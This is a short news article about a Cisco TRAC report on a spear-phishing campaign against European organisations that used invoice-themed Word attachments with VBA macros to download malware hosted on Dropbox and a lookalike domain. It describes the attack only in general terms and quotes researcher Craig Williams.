Craig Williams, technical leader of Cisco's Threat Research Analysis and Communications (TRAC) team, delved into attackers' exploits in a Monday blog post. According to Williams, the group lures targets with malicious emails crafted to look like business invoices.
Those who take the bait, or phishing emails crafted for specific company members, download malware via a malicious Microsoft Word attachment. When opened, the file is rigged to download a malicious executable, Williams wrote. The malware contacts several domains during this process, including a Dropbox cloud-based file-sharing service, where attackers host malware payloads.
In email correspondence with SCMagazine.com, Williams explained that hackers leveraged a Microsoft programming language, Visual Basic for Applications, to lay their trap.
“This is really an abused feature,” Williams said. “The attacks are using Visual Basic Scripting for Applications to cause an On-Open macro to fire when the victim opens the Word document. This will result in downloading an executable and launching it on the victim's machine. It's quite an old technique,” he added.
Along with the Dropbox url, other domains the malware contacted, such as londonpaerl.co.uk (a close match for legitimate site, londonpearl.co.uk), were used to host backdoors, though Cisco blocked the malware from its clients.
According to Williams, Cisco thwarted attacks from the group throughout May and June, though the majority of attacks occurred last month.
The spear phishing campaign has, so far, targeted organizations in Europe, Williams wrote, adding that hackers were likely motivated by “monetary gain.”
Next week, Cisco plans to divulge more information on the group's exploits, specifically the malware used by attackers and their obfuscation techniques, the company blog post said.